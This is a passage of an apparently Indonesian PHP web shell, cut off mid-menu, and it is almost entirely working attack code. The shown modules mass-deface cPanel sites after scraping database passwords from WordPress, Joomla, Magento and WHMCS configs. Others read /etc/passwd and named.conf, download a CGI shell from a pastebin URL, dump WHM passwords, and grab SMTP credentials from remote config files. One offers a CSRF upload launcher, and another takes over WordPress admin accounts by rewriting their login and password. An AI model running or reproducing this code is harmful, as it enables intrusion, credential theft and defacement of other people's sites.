  2454.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  2455.                                     if(function_exists('posix_getpwuid')) {
  2456.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  2457.                                         if($domain_cp == '') {
  2458.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2459.                                         } else {
  2460.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2461.                                             foreach($domains_cp[1] as $dj) {
  2462.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2463.                                                 $user_cp_url = $user_cp_url['name'];
  2464.                                                 if($user_cp_url == $ucp) {
  2465.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  2466.                                                     break;
  2467.                                                 }
  2468.                                             }
  2469.                                         }
  2470.                                     } else {
  2471.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2472.                                     }
  2473.                                 } else {
  2474.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  2475.                                 }
  2476.                             }
  2477.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2478.                         }
  2479.                     }
  2480.                 }
  2481.             }
  2482.         }
  2483.         if($i == 0) {
  2484.         } else {
  2485.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Mr.ToKeiChun69.</font>";
  2486.         }
  2487.     } else {
  2488.         echo "<center>
  2489.         <form method='post'>
  2490.         Filename: <br>
  2491.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  2492.         Deface Page: <br>
  2493.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  2494.         USER: <br>
  2495.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2496.         $_usercp = fopen("/etc/passwd","r");
  2497.         while($getu = fgets($_usercp)) {
  2498.             if($getu == '' || !$_usercp) {
  2499.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2500.             } else {
  2501.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2502.                 foreach($u[1] as $user_cp) {
  2503.                         if(is_dir("/home/$user_cp/public_html")) {
  2504.                             echo "$user_cp\n";
  2505.                     }
  2506.                 }
  2507.             }
  2508.         }
  2509.         echo "</textarea><br>
  2510.         PASS: <br>
  2511.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2512.         function cp_pass($dir) {
  2513.             $pass = "";
  2514.             $dira = scandir($dir);
  2515.             foreach($dira as $dirb) {
  2516.                 if(!is_file("$dir/$dirb")) continue;
  2517.                 $ambil = file_get_contents("$dir/$dirb");
  2518.                 if(preg_match("/WordPress/", $ambil)) {
  2519.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2520.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2521.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2522.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2523.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2524.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2525.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2526.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2527.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2528.                 } elseif(preg_match("/client/", $ambil)) {
  2529.                     preg_match("/password=(.*)/", $ambil, $pass1);
  2530.                     if(preg_match('/"/', $pass1[1])) {
  2531.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2532.                         $pass .= $pass1[1]."\n";
  2533.                     }
  2534.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2535.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2536.                 }
  2537.             }
  2538.             echo $pass;
  2539.         }
  2540.         $cp_pass = cp_pass($dir);
  2541.         echo $cp_pass;
  2542.         echo "</textarea><br>
  2543.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  2544.         </form>
  2545.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2546.     }
  2547. } elseif($_GET['do'] == 'cgi') {
  2548.     $cgi_dir = mkdir('cgi', 0755);
  2549.     $file_cgi = "cgi/cgi.izo";
  2550.     $isi_htcgi = "AddHandler cgi-script .izo";
  2551.     $htcgi = fopen(".htaccess", "w");
  2552.     fwrite($htcgi, $isi_htcgi);
  2553.     fclose($htcgi);
  2554.     $cgi_script = getsource("https://pastebin.com/raw.php?i=amaDeGWf");
  2555.     $cgi = fopen($file_cgi, "w");
  2556.     fwrite($cgi, $cgi_script);
  2557.     fclose($cgi);
  2558.     chmod($file_cgi, 0755);
  2559.     echo "<iframe src='cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2560. }
  2561. elseif($_GET['do'] == 'tool') {
  2562. echo "<center>";
  2563. echo "<ul>";
  2564. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2565. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2566. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2567. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2568. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2569. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2570. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2571. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2572. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2573. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2574. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2575. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2576. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2577. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2578. echo "</ul>";
  2579. echo "</center>";
  2580. }
  2581. elseif($_GET['do'] == 'manjat') {
  2582. echo "<center>";
  2583. echo "<ul>";
  2584. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2585. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2586. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2587. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2588. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2589. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2590. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2591. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2592. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2593. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2594. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2595. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2596. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2597. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2598. echo "</ul>";
  2599. echo "</center>";
  2600.  
  2601.     echo "<center>";
  2602.     $d0mains = @file('/etc/named.conf');
  2603.     $domains = scandir("/var/named");
  2604.      
  2605.     if ($domains or $d0mains)
  2606.     {
  2607.         $domains = scandir("/var/named");
  2608.         if($domains) {
  2609.     echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
  2610.     $count=1;
  2611.     $dc = 0;
  2612.     $list = scandir("/var/named");
  2613.     foreach($list as $domain){
  2614.     if(strpos($domain,".db")){
  2615.     $domain = str_replace('.db','',$domain);
  2616.     $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2617.     $dirz = '/home/'.$owner['name'].'/cpanel3-skel';
  2618.     $path = getcwd();
  2619.      
  2620.     if (is_readable($dirz)) {
  2621.     copy($dirz, ''.$path.'/lol/'.$owner['name'].'.txt');
  2622.     $p=file_get_contents(''.$path.'/lol/'.$owner['name'].'.txt');
  2623.     $password=entre2v2($p,'password="','"');
  2624.     echo "<tr><td>".$count++."</td><td><a href='http://$domain' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td></tr>";
  2625.     $dc++;
  2626.     }
  2627.      
  2628.     }
  2629.     }
  2630.     echo '</table>';
  2631.     $total = $dc;
  2632.     echo '<br><div class="result">Total WHM User Found = '.$total.'</h3><br />';
  2633.     echo '</center>';
  2634.     }else{
  2635.     $d0mains = @file('/etc/named.conf');
  2636.         if($d0mains) {
  2637.     echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
  2638.     $count=1;
  2639.     $dc = 0;
  2640.     $mck = array();
  2641.     foreach($d0mains as $d0main){
  2642.         if(@eregi('zone',$d0main)){
  2643.             preg_match_all('#zone "(.*)"#',$d0main,$domain);
  2644.             flush();
  2645.             if(strlen(trim($domain[1][0])) >2){
  2646.                 $mck[] = $domain[1][0];
  2647.             }
  2648.         }
  2649.     }
  2650.     $mck = array_unique($mck);
  2651.     $usr = array();
  2652.     $dmn = array();
  2653.     foreach($mck as $o) {
  2654.         $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  2655.         $usr[] = $infos['name'];
  2656.         $dmn[] = $o;
  2657.     }
  2658.     array_multisort($usr,$dmn);
  2659.     $dt = file('/etc/passwd');
  2660.     $passwd = array();
  2661.     foreach($dt as $d) {
  2662.         $r = explode(':',$d);
  2663.         if(strpos($r[5],'home')) {
  2664.             $passwd[$r[0]] = $r[5];
  2665.         }
  2666.     }
  2667.     $l=0;
  2668.     $j=1;
  2669.     foreach($usr as $r) {
  2670.     $dirz = '/home/'.$r.'/cpanel3-skel';
  2671.     $path = getcwd();
  2672.     if (is_readable($dirz)) {
  2673.     copy($dirz, ''.$path.'/lol/'.$r.'.txt');
  2674.     $p=file_get_contents(''.$path.'/lol/'.$r.'.txt');
  2675.     $password=entre2v2($p,'password="','"');
  2676.     echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td></tr>";
  2677.     $dc++;
  2678.                     flush();
  2679.                     $l=$l?0:1;
  2680.                     $j++;
  2681.                                     }
  2682.                 }
  2683.                             }
  2684.     echo '</table>';
  2685.     $total = $dc;
  2686.     echo '<br><div class="result">Total WHM Account Found = '.$total.'</h3><br />';
  2687.     echo '</center>';
  2688.      
  2689.     }
  2690.     }
  2691.  
  2692. }
  2693. elseif($_GET['do'] == 'smtp') {
  2694. echo "<center>";
  2695. echo "<ul>";
  2696. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2697. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2698. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2699. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2700. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2701. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2702. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2703. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2704. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2705. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2706. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2707. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2708. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2709. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2710. echo "</ul>";
  2711. echo "</center>";
  2712.     echo"<center>
  2713.     <br><br><br>
  2714.     VHosts SMTP Grabber<br><br>
  2715.     <form method='post'>
  2716.     <textarea style='width: 450px; height: 150px;' name='sites' placeholder='http://domen.com/dir_config/config.txt'></textarea><br>
  2717.     <input type='submit' name='go' value='Hajar'>
  2718.     </form>";
  2719.     $ya=$_POST['go'];
  2720.     $co=$_POST['sites'];
  2721.  
  2722.     if($ya){
  2723.      $e=explode("\r\n",$co);
  2724.      foreach($e as $bda){
  2725.         //echo '<br>'.$bda;
  2726.         $linkof='';
  2727.         $dn=($bda).($linkof);
  2728.         $file=@file_get_contents($dn);
  2729.         if(preg_match("/JConfig|joomla/", $file)) {
  2730.         echo'<center><font face="Iceland" color=Red >----------------------------------------------</font></center>';
  2731.                     echo "<font face='Iceland' color=lime >SMTP USER : </font>".findit($file,"smtpuser = '","'")."<br>";
  2732.                     echo "<font face='Iceland' color=lime >SMTP PASS : </font>".findit($file,"smtppass = '","'")."<br>";
  2733.                     echo "<font face='Iceland' color=lime >SMTP HOST : </font>".findit($file,"smtphost = '","'")."<br>";
  2734.                     echo "<font face='Iceland' color=lime >SMTP PORT : </font>".findit($file,"smtpport = '","'")."<br>";
  2735.                     echo "<font face='Iceland' color=lime >SMTP AUTH : </font>".findit($file,"smtpauth = '","'")."<br>";
  2736.                     echo "<font face='Iceland' color=lime >SMTP SECURE : </font>".findit($file,"smtpsecure = '","'")."<br>";
  2737.         }
  2738.        
  2739.         else{echo "<center><font face='Iceland' color='Red' >".$bda." ----> There is no SMTP </font></center>";}
  2740.         echo'<center><font face="Iceland" color=red >----------------------------------------------</font></center>';
  2741.      }
  2742.      
  2743.     }
  2744.  
  2745.  
  2746. }
  2747. elseif($_GET['do'] == 'scdc') {
  2748. echo "<center>";
  2749. echo "<ul>";
  2750. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2751. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2752. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2753. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2754. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2755. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2756. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2757. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2758. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2759. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2760. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2761. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2762. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2763. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2764. echo "</ul>";
  2765. echo "</center>";
  2766.  
  2767.         $text = $_POST['code'];
  2768.     echo"<center><br><b>Script Encode and Decode</b><br>
  2769.     <form method='post'><br><br><br>
  2770.     <textarea style='width: 450px; height: 150px;' name='code' placeholder='scmu'></textarea><br><br>
  2771.     <select class='inputz' size='1' name='ope'>
  2772.     <option value='base64'>Base64</option>
  2773.     <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
  2774.     <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
  2775.     </select>&nbsp;<input type='submit' name='submit' value='Encrypt'>
  2776.     <input type='submit' name='submits' value='Decrypt'>
  2777.     </form>";
  2778.         $submit = $_POST['submit'];
  2779.         if (isset($submit)) {
  2780.             $op = $_POST["ope"];
  2781.             switch ($op) {
  2782.                 case 'base64':
  2783.                     $codi = base64_encode($text);
  2784.                 break;
  2785.                 case 'str':
  2786.                     $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  2787.                 break;
  2788.                 case 'gzinflate':
  2789.                     $codi = base64_encode(gzdeflate(str_rot13($text)));
  2790.                 break;
  2791.                 default:
  2792.                 break;
  2793.             }
  2794.         }
  2795.         $submit = $_POST['submits'];
  2796.         if (isset($submit)) {
  2797.             $op = $_POST["ope"];
  2798.             switch ($op) {
  2799.                 case 'base64':
  2800.                     $codi = base64_decode($text);
  2801.                 break;
  2802.                 case 'str':
  2803.                     $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  2804.                 break;
  2805.                 case 'gzinflate':
  2806.                     $codi = str_rot13(gzinflate(base64_decode($text)));
  2807.                 break;
  2808.                 default:
  2809.                 break;
  2810.             }
  2811.         }
  2812.         echo "<textarea style='width: 450px; height: 150px;' readonly>$codi</textarea></center><BR><BR>";
  2813. }
  2814. elseif($_GET['do'] == 'csrf') {
  2815. echo "<center>";
  2816. echo "<ul>";
  2817. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2818. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2819. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2820. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2821. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2822. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2823. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2824. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2825. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2826. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2827. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2828. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2829. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2830. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2831. echo "</ul>";
  2832. echo "</center>";
  2833.  
  2834.     echo"<center> CSRF ONLINE
  2835.     <html>
  2836.     <form method='post'>
  2837.     <select name='array' required>
  2838.     <option value=''>Array</option>
  2839.     <option value='files[]'>files []</option>
  2840.     <option value='qqfile'>qqfile</option>
  2841.     <option value='Filedata'>Filedata</option>
  2842.     <option value='FileUpload'>FileUpload</option>
  2843.     <option value='userfile'>userfile</option>
  2844.     <option value='Uploadfile'>Uploadfile</option>
  2845.     <option value='file'>file</option>
  2846.     </select>
  2847.     <input type='text' name='target' size='50' height='10' placeholder='url http://site.com/bug/vuln.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  2848.     <input type='submit' name='kunci' value='Lock!'>
  2849.     </form>";
  2850.  
  2851.     $url = $_POST['target'];
  2852.     $pf = $_POST['array'];
  2853.     $terkuncyihh = $_POST['kunci'];
  2854.     if($terkuncyihh) {
  2855.         echo "<form method='post'
  2856.         target='_blank' action='$url'
  2857.         enctype='multipart/form-data'>
  2858.         <input type='file' name='$pf'>
  2859.         <input type='submit' name='g'
  2860.         value='Hajar'></form";
  2861.     }
  2862. }
  2863. elseif($_GET['do'] == 'dos') {
  2864. echo "<center>";
  2865. echo "<ul>";
  2866. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2867. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2868. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2869. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2870. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2871. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2872. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2873. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2874. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2875. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2876. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2877. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2878. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2879. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2880. echo "</ul>";
  2881. echo "</center>";
  2882.  
  2883.     $all = array();
  2884.     // domain finder.
  2885.     $d0mains = file('/etc/named.conf');
  2886.     $domains = scandir("/var/named");
  2887.  
  2888.     if($domains or $d0mains){
  2889.       $count = 0;
  2890.       if($domains){
  2891.         echo "<center><h1>Count Domains on user</h1></center><br><br>";
  2892.         $cur = array();
  2893.         foreach($domains as $domain){
  2894.           if(strpos($domain, '.db')){
  2895.             $dom = str_replace('.db', '', $domain);
  2896.             $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  2897.             $user = $own['name'];
  2898.             $all[$user][] = $dom;
  2899.             //echo "$user: $dom<br/>";
  2900.           }
  2901.         }
  2902.         echo "";
  2903.       }
  2904.       elseif($d0mains){
  2905.  
  2906.         $mck = array();
  2907.         foreach($d0mains as $domain){
  2908.           preg_match_all('#zone "(.*)"#',$domain,$dom);
  2909.           flush();
  2910.           if(strlen(trim($domain[1][0])) >2){
  2911.             $mck[] = $dom[1][0];
  2912.           }
  2913.         }
  2914.        
  2915.         $mck = array_unique($mck);
  2916.         foreach($mck as $dom){
  2917.           $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  2918.           $user = $own['name'];
  2919.           $all[$user][] = $dom;
  2920.           //echo "$user: $dom<br/>";
  2921.         }
  2922.         echo "";
  2923.       }
  2924.     }
  2925. foreach($all as $user => $domain){
  2926.   echo "<center>User <font color='red'>$user</font> has <font color='red'>".count($domain)."</font> Domains below :<br></center>";
  2927.   echo "<center>---------------<br>";
  2928.   foreach($domain as $v){
  2929.     echo "<center><a href='http://$v/' target='_blank'>http://$v<a><br></center>";
  2930.     }
  2931.   echo "<center>---------------";
  2932.   echo "<br><br>";
  2933.         }
  2934.  
  2935. }
  2936. elseif($_GET['do'] == 'wpes') {
  2937. echo "<center>";
  2938. echo "<ul>";
  2939. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2940. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2941. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2942. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2943. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2944. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2945. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2946. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2947. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2948. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2949. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2950. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2951. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2952. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2953. echo "</ul>";
  2954. echo "</center>";
  2955.  
  2956.     if($_POST['auto_deface_wp']) {
  2957.         function anucurl($sites) {
  2958.             $ch = curl_init($sites);
  2959.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2960.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2961.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2962.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2963.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2964.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2965.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2966.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2967.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2968.             $data = curl_exec($ch);
  2969.                   curl_close($ch);
  2970.             return $data;
  2971.         }
  2972.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2973.             $post = array(
  2974.                    "log" => "$userr",
  2975.                    "pwd" => "$pass",
  2976.                    "rememberme" => "forever",
  2977.                    "wp-submit" => "$wp_submit",
  2978.                    "redirect_to" => "$web",
  2979.                    "testcookie" => "1",
  2980.                    );
  2981.             $ch = curl_init($cek);
  2982.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2983.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2984.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2985.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2986.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2987.                   curl_setopt($ch, CURLOPT_POST, 1);
  2988.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2989.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2990.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2991.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2992.             $data = curl_exec($ch);
  2993.                   curl_close($ch);
  2994.             return $data;
  2995.         }
  2996.         $link = explode("\r\n", $_POST['link']);
  2997.         $script = htmlspecialchars($_POST['script']);
  2998.         $user = "bahari";
  2999.         $pass = "bahari";
  3000.         $passx = md5($pass);
  3001.         foreach($link as $dir_config) {
  3002.             $config = anucurl($dir_config);
  3003.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  3004.             $dbuser = ambilkata($config,"DB_USER', '","'");
  3005.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3006.             $dbname = ambilkata($config,"DB_NAME', '","'");
  3007.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3008.             $prefix = $dbprefix."users";
  3009.             $option = $dbprefix."options";
  3010.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3011.             $db = mysql_select_db($dbname);
  3012.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3013.             $result = mysql_fetch_array($q);
  3014.             $id = $result[ID];
  3015.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3016.             $result2 = mysql_fetch_array($q2);
  3017.             $target = $result2[option_value];
  3018.             if($target == '') {                
  3019.                 echo "Error, Cant edit the user :(</font><br>";
  3020.             } else {
  3021.                 echo "<font color='lime'>Done</font> >> <a href='$target/wp-login.php' target='_blank'> $target <a><br>
  3022.                       <font color='lime'>User</font>  : bahari<br>
  3023.                       <font color='lime'>Password</font>  : bahari<br>";
  3024.             }
  3025.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3026.             if(!$conn OR !$db OR !$update) {
  3027.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3028.                 mysql_close($conn);
  3029.             } else {
  3030.             }
  3031.         }
  3032.     } else {
  3033.         echo "<center><h1>WordPress Auto Edit User</h1>
  3034.         <form method='post'>
  3035.         Link Config: <br>
  3036.         <textarea name='link' placeholder='http://target.com/btm_conf/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  3037.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar'>
  3038.         </form></center>";
  3039.         }
  3040. }
  3041. elseif($_GET['do'] == 'rdp') {
  3042. echo "<center>";
  3043. echo "<ul>";
  3044. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3045. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3046. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3047. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3048. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3049. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3050. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3051. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
